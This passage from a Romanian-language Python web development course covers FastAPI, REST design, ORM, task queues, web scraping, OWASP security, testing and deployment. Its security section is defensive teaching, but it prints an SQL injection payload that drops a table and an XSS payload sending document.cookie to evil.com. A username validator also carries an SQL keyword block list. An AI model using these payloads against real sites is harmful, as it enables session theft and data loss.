        raise HTTPException(status_code=404, detail="User not found")
    del db[user_id]

# Health check:
@app.get("/health", tags=["system"])
async def health():
    return {"status": "healthy", "timestamp": datetime.now().isoformat()}

# Documentație automată:
# Swagger UI: http://localhost:8000/docs
# ReDoc:      http://localhost:8000/redoc
# OpenAPI:    http://localhost:8000/openapi.json

# Rulare: uvicorn main:app --reload --host 0.0.0.0 --port 8000

14. REST — principii de design¶

14.1 Convenții URL¶

Resurse = substantive (plural), NU verbe:
  ✅ GET    /api/users                     (listare)
  ✅ GET    /api/users/42                  (citire una)
  ✅ POST   /api/users                     (creare)
  ✅ PUT    /api/users/42                  (actualizare completă)
  ✅ PATCH  /api/users/42                  (actualizare parțială)
  ✅ DELETE /api/users/42                  (ștergere)

  ❌ GET    /api/getUser/42               (verb în URL!)
  ❌ POST   /api/createUser               (verb în URL!)
  ❌ POST   /api/deleteUser/42            (metoda greșită + verb!)

Resurse nested (relații):
  GET /api/users/42/posts                  (postările user-ului 42)
  GET /api/users/42/posts/7                (postarea 7 a user-ului 42)
  POST /api/users/42/posts                 (creare postare pentru user 42)

Filtrare, sortare, paginare — query parameters:
  GET /api/users?status=active&sort=-created_at&page=2&per_page=20

Versionare API:
  /api/v1/users                            (în URL — cel mai comun)
  Accept: application/vnd.myapi.v2+json    (în header — mai corect teoretic)

14.2 Structura răspunsurilor — consistentă¶

# === Răspuns de succes (singular) ===
# GET /api/users/42
{
    "id": 42,
    "name": "Ana Pop",
    "email": "ana@example.com",
    "created_at": "2024-01-15T10:30:00Z"
}

# === Răspuns de succes (colecție) ===
# GET /api/users?page=2&per_page=10
{
    "data": [
        {"id": 42, "name": "Ana Pop", ...},
        {"id": 43, "name": "Ion Rus", ...}
    ],
    "pagination": {
        "total": 156,
        "page": 2,
        "per_page": 10,
        "pages": 16,
        "next": "/api/users?page=3&per_page=10",
        "prev": "/api/users?page=1&per_page=10"
    }
}

# === Răspuns de eroare (mereu aceeași structură!) ===
# 400 Bad Request
{
    "error": {
        "code": "VALIDATION_ERROR",
        "message": "Validation failed",
        "details": [
            {"field": "email", "message": "Invalid email format"},
            {"field": "age", "message": "Must be between 16 and 120"}
        ]
    }
}

# 404 Not Found
{
    "error": {
        "code": "NOT_FOUND",
        "message": "User with id 999 not found"
    }
}

16. Baze de date și ORM în aplicații web¶

# FastAPI + SQLAlchemy + PostgreSQL — setup complet

from sqlalchemy import create_engine, Column, Integer, String, Boolean, DateTime
from sqlalchemy.orm import declarative_base, sessionmaker, Session
from sqlalchemy.sql import func
from fastapi import Depends

DATABASE_URL = "postgresql://user:pass@localhost:5432/appdb"

engine = create_engine(DATABASE_URL, pool_size=10, max_overflow=20)
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
Base = declarative_base()

# Model SQLAlchemy:
class UserModel(Base):
    __tablename__ = "users"

    id = Column(Integer, primary_key=True, index=True)
    name = Column(String(100), nullable=False)
    email = Column(String(150), unique=True, nullable=False, index=True)
    active = Column(Boolean, default=True)
    created_at = Column(DateTime(timezone=True), server_default=func.now())

# Dependency injection pentru sesiunea DB:
def get_db():
    db = SessionLocal()
    try:
        yield db
    finally:
        db.close()

# Endpoint cu DB reală:
@app.get("/api/users/{user_id}", response_model=UserResponse)
async def get_user(user_id: int, db: Session = Depends(get_db)):
    user = db.query(UserModel).filter(UserModel.id == user_id).first()
    if not user:
        raise HTTPException(status_code=404, detail="User not found")
    return user

@app.post("/api/users", response_model=UserResponse, status_code=201)
async def create_user(user: UserCreate, db: Session = Depends(get_db)):
    existing = db.query(UserModel).filter(UserModel.email == user.email).first()
    if existing:
        raise HTTPException(status_code=409, detail="Email already exists")

    db_user = UserModel(**user.model_dump())
    db.add(db_user)
    db.commit()
    db.refresh(db_user)
    return db_user

17. Background tasks, cozi și procesare asincronă¶

from fastapi import BackgroundTasks

# === Background Tasks (FastAPI built-in) ===
def send_welcome_email(email: str, name: str):
    """Task executat în background DUPĂ trimiterea răspunsului."""
    import time
    time.sleep(2)    # Simulare trimitere email
    print(f"Email trimis la {email} pentru {name}")

@app.post("/api/users", status_code=201)
async def create_user(user: UserCreate, background_tasks: BackgroundTasks):
    # Creare user (rapid)...
    db_user = save_user(user)

    # Programare task background (nu blochează răspunsul):
    background_tasks.add_task(send_welcome_email, user.email, user.name)

    return db_user    # Răspuns trimis IMEDIAT, email-ul se trimite async

# === Celery (pentru task-uri serioase în producție) ===
from celery import Celery

celery_app = Celery("tasks", broker="redis://localhost:6379/0")

@celery_app.task(bind=True, max_retries=3, default_retry_delay=60)
def process_order(self, order_id: int):
    try:
        # Procesare lungă (plată, inventar, notificări)...
        order = get_order(order_id)
        charge_payment(order)
        update_inventory(order)
        send_confirmation(order)
    except Exception as exc:
        self.retry(exc=exc)    # Reîncercare cu backoff

# Apel din endpoint:
@app.post("/api/orders")
async def create_order(order: OrderCreate):
    db_order = save_order(order)
    process_order.delay(db_order.id)    # Trimite la Celery (async)
    return {"id": db_order.id, "status": "processing"}

PARTEA IV — WEB SCRAPING¶

18. Fundamente web scraping¶

# Web scraping = extragerea automată de date din pagini web
# Tipuri de conținut web:
#   Static:  HTML generat pe server, vizibil direct în sursă (requests + BS4)
#   Dinamic: HTML generat de JavaScript în browser (necesită Selenium/Playwright)

# Verificare dacă e static: View Source (Ctrl+U) vs. Inspect Element (F12)
# Dacă datele apar în View Source → static (requests e suficient)
# Dacă datele apar doar în Inspect → dinamic (trebuie browser headless)

# Înainte de scraping, verifică:
# 1. Există un API? (mai bun, mai stabil, mai rapid)
# 2. Există un feed RSS/Atom?
# 3. Există un dataset public descărcabil?
# 4. robots.txt permite scraping? (https://example.com/robots.txt)
# 5. Terms of Service permit scraping?

19. BeautifulSoup — extragerea datelor din HTML¶

import requests
from bs4 import BeautifulSoup

# Descarcă pagina:
url = "https://quotes.toscrape.com/"
response = requests.get(url, headers={"User-Agent": "Mozilla/5.0"})
response.raise_for_status()

# Parsare HTML:
soup = BeautifulSoup(response.text, "html.parser")
# sau: "lxml" (mai rapid), "html5lib" (mai tolerant)

# === Navigare și căutare ===

# Găsire element unic:
title = soup.find("title").text
print(title)

# Găsire toate elementele de un tip:
quotes = soup.find_all("span", class_="text")
for q in quotes:
    print(q.text)

# CSS Selectors (mai puternic):
quotes = soup.select("div.quote span.text")
authors = soup.select("div.quote small.author")
tags_per_quote = soup.select("div.quote div.tags a.tag")

for quote, author in zip(quotes, authors):
    print(f"'{quote.text}' — {author.text}")

# Atribute:
for link in soup.select("a[href]"):
    print(link["href"])               # Valoarea atributului href
    print(link.get("class", []))      # Clasele CSS (listă)
    print(link.text.strip())          # Textul vizibil

# Navigare DOM:
first_quote = soup.select_one("div.quote")
print(first_quote.find("span", class_="text").text)
print(first_quote.find("small", class_="author").text)
tags = [tag.text for tag in first_quote.select("a.tag")]
print(f"Tags: {tags}")

# === Scraping cu paginare ===
def scrape_all_quotes() -> list[dict]:
    all_quotes = []
    page = 1

    while True:
        url = f"https://quotes.toscrape.com/page/{page}/"
        response = requests.get(url)

        if response.status_code == 404:
            break

        soup = BeautifulSoup(response.text, "html.parser")
        quotes = soup.select("div.quote")

        if not quotes:
            break

        for q in quotes:
            all_quotes.append({
                "text": q.select_one("span.text").text.strip('""\u201c\u201d'),
                "author": q.select_one("small.author").text,
                "tags": [t.text for t in q.select("a.tag")]
            })

        # Verifică dacă există pagina următoare:
        next_btn = soup.select_one("li.next a")
        if not next_btn:
            break

        page += 1
        import time
        time.sleep(1)    # Politețe: 1 secundă între cereri

    return all_quotes

quotes = scrape_all_quotes()
print(f"Total: {len(quotes)} citate")

# Salvare în CSV:
import csv
with open("quotes.csv", "w", newline="", encoding="utf-8") as f:
    writer = csv.DictWriter(f, fieldnames=["text", "author", "tags"])
    writer.writeheader()
    for q in quotes:
        q["tags"] = ", ".join(q["tags"])
        writer.writerow(q)

20. Scraping avansat — Selenium și Playwright¶

# === Playwright (modern, recomandat) ===
# pip install playwright && playwright install

from playwright.sync_api import sync_playwright
import json

def scrape_dynamic_page(url: str) -> list[dict]:
    """Scrape o pagină cu conținut generat dinamic de JavaScript."""
    results = []

    with sync_playwright() as p:
        browser = p.chromium.launch(headless=True)
        page = browser.new_page()

        # Navigare:
        page.goto(url, wait_until="networkidle")

        # Așteptare element specific:
        page.wait_for_selector("div.product-card", timeout=10000)

        # Scroll infinit (pentru lazy loading):
        previous_height = 0
        while True:
            page.evaluate("window.scrollTo(0, document.body.scrollHeight)")
            page.wait_for_timeout(2000)    # Așteaptă încărcarea

            current_height = page.evaluate("document.body.scrollHeight")
            if current_height == previous_height:
                break
            previous_height = current_height

        # Extragere date:
        products = page.query_selector_all("div.product-card")
        for product in products:
            name = product.query_selector("h3.name").inner_text()
            price = product.query_selector("span.price").inner_text()
            results.append({"name": name, "price": price})

        # Interacțiune (click, fill, select):
        page.click("button.load-more")
        page.fill("input[name='search']", "Python")
        page.press("input[name='search']", "Enter")
        page.wait_for_load_state("networkidle")

        # Screenshot:
        page.screenshot(path="screenshot.png", full_page=True)

        # Interceptare request-uri API (foarte util!):
        # Uneori e mai simplu să captezi API-ul decât să parsezi HTML

        browser.close()

    return results

# === Interceptare API responses ===
def intercept_api():
    """Captează răspunsurile API ale paginii (cea mai eficientă metodă)."""
    api_data = []

    def handle_response(response):
        if "/api/products" in response.url and response.status == 200:
            api_data.append(response.json())

    with sync_playwright() as p:
        browser = p.chromium.launch(headless=True)
        page = browser.new_page()
        page.on("response", handle_response)
        page.goto("https://example.com/products")
        page.wait_for_timeout(5000)
        browser.close()

    return api_data

21. Scrapy — framework de scraping la scară¶

# Scrapy = framework industrial pentru web scraping
# pip install scrapy

# Structura proiect Scrapy:
# myproject/
# ├── scrapy.cfg
# └── myproject/
#     ├── __init__.py
#     ├── items.py          # Structuri de date
#     ├── middlewares.py     # Middleware custom
#     ├── pipelines.py      # Post-procesare date
#     ├── settings.py       # Configurare
#     └── spiders/
#         └── quotes_spider.py

# === Spider ===
import scrapy

class QuotesSpider(scrapy.Spider):
    name = "quotes"
    start_urls = ["https://quotes.toscrape.com/"]

    # Setări polite:
    custom_settings = {
        "DOWNLOAD_DELAY": 1,           # 1 secundă între cereri
        "CONCURRENT_REQUESTS": 4,      # Max 4 cereri simultane
        "ROBOTSTXT_OBEY": True,        # Respectă robots.txt
        "USER_AGENT": "MyScraperBot/1.0 (contact@example.com)",
        "FEEDS": {
            "quotes.json": {"format": "json", "encoding": "utf-8"},
        },
    }

    def parse(self, response):
        """Parsează pagina de citate."""
        for quote in response.css("div.quote"):
            yield {
                "text": quote.css("span.text::text").get().strip('""\u201c\u201d'),
                "author": quote.css("small.author::text").get(),
                "tags": quote.css("a.tag::text").getall(),
                "url": response.url,
            }

        # Urmărește linkul paginii următoare:
        next_page = response.css("li.next a::attr(href)").get()
        if next_page:
            yield response.follow(next_page, callback=self.parse)

# Rulare: scrapy crawl quotes
# sau din script:
# from scrapy.crawler import CrawlerProcess
# process = CrawlerProcess()
# process.crawl(QuotesSpider)
# process.start()

22. Etică, legalitate și bune practici¶

=== REGULI DE ETICĂ ȘI BUNE PRACTICI ===

1. Verifică robots.txt MEREU:
   https://example.com/robots.txt
   User-agent: *
   Disallow: /private/        # NU accesa aceste căi
   Crawl-delay: 5             # Așteaptă 5 secunde între cereri

2. Respectă Terms of Service:
   Multe site-uri interzic explicit scraping-ul în ToS.
   Dacă există un API oficial → folosește-l.

3. Fii politicos cu serverul:
   - Delay între cereri (minim 1 secundă, ideal 2-5)
   - Limitează concurența (max 2-4 cereri simultane)
   - Identifică-te (User-Agent descriptiv cu email de contact)
   - Nu scrapa în orele de vârf ale site-ului
   - Cachează răspunsurile (nu descarca aceeași pagină de 2 ori)

4. Nu cauza prejudicii:
   - Nu supraîncărca serverul (efectiv un DoS neintenționat)
   - Nu extragi date personale fără consimțământ (GDPR!)
   - Nu folosești datele pentru spam sau hărțuire
   - Nu revinzi date protejate de copyright

5. Aspecte legale:
   - Datele publice pot fi în general accesate
   - Datele personale: GDPR se aplică (UE)
   - Scraping-ul care depășește ToS: zonă gri legală
   - Eludarea măsurilor tehnice (CAPTCHA bypass): potențial ilegal

PARTEA V — SECURITATE WEB¶

23. OWASP Top 10 — vulnerabilități critice¶

23.1 SQL Injection¶

# ❌ VULNERABIL — string concatenation:
query = f"SELECT * FROM users WHERE email = '{user_input}'"
# Dacă user_input = "'; DROP TABLE users; --"
# → SELECT * FROM users WHERE email = ''; DROP TABLE users; --'

# ✅ SIGUR — parameterized queries:
cursor.execute("SELECT * FROM users WHERE email = %s", (user_input,))

# ✅ SIGUR cu ORM (SQLAlchemy):
user = db.query(User).filter(User.email == user_input).first()

23.2 Cross-Site Scripting (XSS)¶

# ❌ VULNERABIL:
@app.route("/search")
def search():
    query = request.args.get("q", "")
    return f"<h1>Results for: {query}</h1>"
# Dacă q = <script>document.location='https://evil.com/?c='+document.cookie</script>

# ✅ SIGUR — escape HTML (auto în template engines):
from markupsafe import escape
return f"<h1>Results for: {escape(query)}</h1>"

# ✅ SIGUR — Content Security Policy header:
# Content-Security-Policy: default-src 'self'; script-src 'self'

23.3 Broken Authentication¶

# ❌ GREȘIT: stochează parole în clar
users_db[email] = {"password": "plain_text_password"}

# ✅ CORECT: hash cu bcrypt (salt automat inclus)
import bcrypt

def hash_password(password: str) -> str:
    return bcrypt.hashpw(password.encode(), bcrypt.gensalt()).decode()

def verify_password(password: str, hashed: str) -> bool:
    return bcrypt.checkpw(password.encode(), hashed.encode())

# Stocare:
hashed = hash_password("MySecretPassword123!")
# "$2b$12$LJ3m4ks8Rt4..." (include salt + hash, 60 caractere)

# Verificare:
if verify_password("MySecretPassword123!", hashed):
    print("Autentificare reușită!")

25. CORS, CSRF, CSP și headere de securitate¶

# === CORS (Cross-Origin Resource Sharing) ===
# Browser-ul blochează cererile cross-origin (de pe alt domeniu) by default.
# Server-ul trebuie să autorizeze explicit.

from fastapi.middleware.cors import CORSMiddleware

app.add_middleware(
    CORSMiddleware,
    allow_origins=["https://myapp.com", "https://admin.myapp.com"],  # NU ["*"] în prod!
    allow_credentials=True,
    allow_methods=["GET", "POST", "PUT", "DELETE"],
    allow_headers=["Authorization", "Content-Type"],
    max_age=3600,    # Cache preflight 1 oră
)

# === CSRF (Cross-Site Request Forgery) ===
# Atacatorul trimite un request din contextul browser-ului victimei.
# Protecție: CSRF token unic per sesiune/formular.

# FastAPI cu cookie-uri:
from fastapi_csrf_protect import CsrfProtect  # pip install fastapi-csrf-protect

# === Security Headers (middleware) ===
from starlette.middleware.base import BaseHTTPMiddleware

class SecurityHeadersMiddleware(BaseHTTPMiddleware):
    async def dispatch(self, request, call_next):
        response = await call_next(request)
        response.headers["Strict-Transport-Security"] = "max-age=31536000; includeSubDomains"
        response.headers["X-Content-Type-Options"] = "nosniff"
        response.headers["X-Frame-Options"] = "DENY"
        response.headers["X-XSS-Protection"] = "0"
        response.headers["Referrer-Policy"] = "strict-origin-when-cross-origin"
        response.headers["Content-Security-Policy"] = "default-src 'self'"
        response.headers["Permissions-Policy"] = "camera=(), microphone=(), geolocation=()"
        return response

app.add_middleware(SecurityHeadersMiddleware)

27. Rate limiting, input validation și sanitizare¶

from fastapi import Request
from slowapi import Limiter
from slowapi.util import get_remote_address

# === Rate Limiting ===
limiter = Limiter(key_func=get_remote_address)

@app.get("/api/search")
@limiter.limit("30/minute")
async def search(request: Request, q: str):
    return {"results": do_search(q)}

# === Input Validation (Pydantic) ===
from pydantic import BaseModel, Field, field_validator
import re

class RegistrationForm(BaseModel):
    username: str = Field(min_length=3, max_length=30, pattern=r"^[a-zA-Z0-9_]+$")
    email: EmailStr
    password: str = Field(min_length=8, max_length=128)

    @field_validator("password")
    @classmethod
    def password_strength(cls, v):
        if not re.search(r"[A-Z]", v):
            raise ValueError("Password must contain uppercase letter")
        if not re.search(r"[a-z]", v):
            raise ValueError("Password must contain lowercase letter")
        if not re.search(r"\d", v):
            raise ValueError("Password must contain digit")
        return v

    @field_validator("username")
    @classmethod
    def no_sql_injection(cls, v):
        dangerous = ["'", '"', ";", "--", "/*", "*/", "DROP", "DELETE", "INSERT"]
        for d in dangerous:
            if d.lower() in v.lower():
                raise ValueError("Invalid characters in username")
        return v

PARTEA VI — ARHITECTURI ȘI PATTERNS AVANSATE¶

28. Microservicii și comunicare inter-servicii¶

# === Comunicare sincronă (HTTP) între microservicii ===
class OrderService:
    def __init__(self, user_service_url: str, inventory_service_url: str):
        self.user_url = user_service_url
        self.inventory_url = inventory_service_url
        self.session = create_resilient_session()  # Cu retry

    async def create_order(self, user_id: int, product_id: int, qty: int):
        # 1. Verifică utilizatorul:
        user = self.session.get(f"{self.user_url}/api/users/{user_id}").json()

        # 2. Verifică stocul:
        stock = self.session.get(
            f"{self.inventory_url}/api/products/{product_id}/stock"
        ).json()
        if stock["available"] < qty:
            raise InsufficientStockError()

        # 3. Rezervă stocul:
        self.session.post(
            f"{self.inventory_url}/api/products/{product_id}/reserve",
            json={"quantity": qty}
        )

        # 4. Creează comanda local:
        order = save_order(user_id, product_id, qty)
        return order

# === Comunicare asincronă (message queue) — mai rezistent ===
# Când Order Service creează o comandă:
# 1. Salvează comanda în DB proprie
# 2. Publică eveniment "order.created" pe message queue (Redis/RabbitMQ/Kafka)
# 3. Inventory Service consumă evenimentul și actualizează stocul
# 4. Payment Service consumă evenimentul și procesează plata
# 5. Notification Service consumă evenimentul și trimite email
# → Serviciile sunt decuplate: căderea unuia nu afectează celelalte

30. Caching la nivel web¶

import redis
import json
from functools import wraps

# Redis cache:
cache = redis.Redis(host="localhost", port=6379, db=0, decode_responses=True)

def cached(ttl_seconds: int = 300):
    """Decorator de caching cu Redis."""
    def decorator(func):
        @wraps(func)
        async def wrapper(*args, **kwargs):
            # Construiește cheia cache:
            key = f"cache:{func.__name__}:{hash(str(args) + str(kwargs))}"

            # Verifică cache:
            cached_result = cache.get(key)
            if cached_result:
                return json.loads(cached_result)

            # Execută funcția:
            result = await func(*args, **kwargs)

            # Salvează în cache:
            cache.setex(key, ttl_seconds, json.dumps(result, default=str))

            return result
        return wrapper
    return decorator

@app.get("/api/products/{product_id}")
@cached(ttl_seconds=600)    # Cache 10 minute
async def get_product(product_id: int):
    # Interogare DB costisitoare:
    product = db.query(Product).filter(Product.id == product_id).first()
    return product

# HTTP Cache Headers:
from fastapi.responses import JSONResponse

@app.get("/api/config")
async def get_config():
    config = load_config()
    response = JSONResponse(content=config)
    response.headers["Cache-Control"] = "public, max-age=3600"    # 1 oră
    response.headers["ETag"] = f'"{hash(str(config))}"'
    return response

31. Testarea aplicațiilor web¶

import pytest
from fastapi.testclient import TestClient
from httpx import AsyncClient

# === TestClient (sincron, simplu) ===
client = TestClient(app)

class TestUserAPI:
    def test_create_user(self):
        response = client.post(
            "/api/users",
            json={"name": "Ana", "email": "ana@test.com", "age": 21},
            headers={"Authorization": "Bearer secret-token"}
        )
        assert response.status_code == 201
        data = response.json()
        assert data["name"] == "Ana"
        assert "id" in data

    def test_create_user_duplicate_email(self):
        client.post("/api/users", json={"name": "A", "email": "dup@test.com", "age": 20},
                     headers={"Authorization": "Bearer secret-token"})
        response = client.post(
            "/api/users", json={"name": "B", "email": "dup@test.com", "age": 25},
            headers={"Authorization": "Bearer secret-token"}
        )
        assert response.status_code == 409

    def test_get_user_not_found(self):
        response = client.get("/api/users/99999")
        assert response.status_code == 404

    def test_create_user_validation(self):
        response = client.post(
            "/api/users",
            json={"name": "", "email": "invalid", "age": -1},
            headers={"Authorization": "Bearer secret-token"}
        )
        assert response.status_code == 422     # Validation error

    def test_unauthorized(self):
        response = client.post("/api/users", json={"name": "X", "email": "x@x.com", "age": 20})
        assert response.status_code == 403  # sau 401

    def test_list_users_pagination(self):
        response = client.get("/api/users?page=1&per_page=5")
        assert response.status_code == 200
        data = response.json()
        assert "data" in data
        assert "total" in data
        assert len(data["data"]) <= 5

# === Async Testing (httpx) ===
@pytest.mark.anyio
async def test_async_endpoint():
    async with AsyncClient(app=app, base_url="http://test") as ac:
        response = await ac.get("/health")
        assert response.status_code == 200

# === Mocking external APIs ===
from unittest.mock import patch

def test_order_with_mocked_payment():
    with patch("services.payment.charge") as mock_charge:
        mock_charge.return_value = {"transaction_id": "txn_123"}
        response = client.post("/api/orders", json={"product_id": 1, "qty": 2})
        assert response.status_code == 201
        mock_charge.assert_called_once()

32. Deployment și producție¶

# === Gunicorn + Uvicorn (WSGI/ASGI production server) ===
# Nu folosiți niciodată `flask run` sau `uvicorn --reload` în producție!

# FastAPI (ASGI):
# gunicorn main:app -w 4 -k uvicorn.workers.UvicornWorker --bind 0.0.0.0:8000

# Flask (WSGI):
# gunicorn main:app -w 4 --bind 0.0.0.0:5000

# Dockerfile producție:
FROM python:3.12-slim

RUN groupadd -r app && useradd -r -g app app

WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt

COPY src/ ./src/
USER app

EXPOSE 8000
HEALTHCHECK --interval=30s --timeout=5s CMD curl -f http://localhost:8000/health || exit 1

CMD ["gunicorn", "src.main:app", \
     "-w", "4", \
     "-k", "uvicorn.workers.UvicornWorker", \
     "--bind", "0.0.0.0:8000", \
     "--access-logfile", "-", \
     "--error-logfile", "-", \
     "--timeout", "30", \
     "--graceful-timeout", "30"]

# Nginx reverse proxy:
server {
    listen 443 ssl http2;
    server_name api.example.com;

    ssl_certificate     /etc/nginx/certs/fullchain.pem;
    ssl_certificate_key /etc/nginx/certs/privkey.pem;

    # Security headers
    add_header Strict-Transport-Security "max-age=31536000" always;
    add_header X-Content-Type-Options nosniff always;
    add_header X-Frame-Options DENY always;

    # Rate limiting
    limit_req_zone $binary_remote_addr zone=api:10m rate=30r/s;

    location /api/ {
        limit_req zone=api burst=50 nodelay;

        proxy_pass http://127.0.0.1:8000;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;

        proxy_connect_timeout 5s;
        proxy_read_timeout 30s;
    }

    location /static/ {
        alias /var/www/static/;
        expires 30d;
        add_header Cache-Control "public, immutable";
    }
}

Anexe¶

A. HTTP Status Codes — referință rapidă¶

2xx Succes:   200 OK, 201 Created, 204 No Content
3xx Redirect: 301 Permanent, 302 Found, 304 Not Modified
4xx Client:   400 Bad Request, 401 Unauthorized, 403 Forbidden,
              404 Not Found, 409 Conflict, 422 Unprocessable, 429 Rate Limited
5xx Server:   500 Internal Error, 502 Bad Gateway, 503 Unavailable, 504 Timeout

B. Biblioteci Python web esențiale¶

HTTP Client:     requests, httpx (async), aiohttp
Web Frameworks:  Flask, FastAPI, Django, Starlette
Templating:      Jinja2, Mako
Validation:      Pydantic, marshmallow, cerberus
ORM:             SQLAlchemy, Tortoise-ORM, Peewee
Auth:            PyJWT, python-jose, authlib, passlib
Scraping:        BeautifulSoup4, lxml, Scrapy, Playwright, Selenium
Testing:         pytest, httpx (TestClient), responses (mock HTTP)
WebSockets:      websockets, python-socketio
Task Queues:     Celery, RQ, Dramatiq, Huey
Caching:         redis-py, cachetools
Rate Limiting:   slowapi, limits
Security:        bcrypt, argon2-cffi, cryptography

Curs realizat ca material de referință pentru dezvoltatori web, ingineri backend și studenți de informatică.

Pe această pagină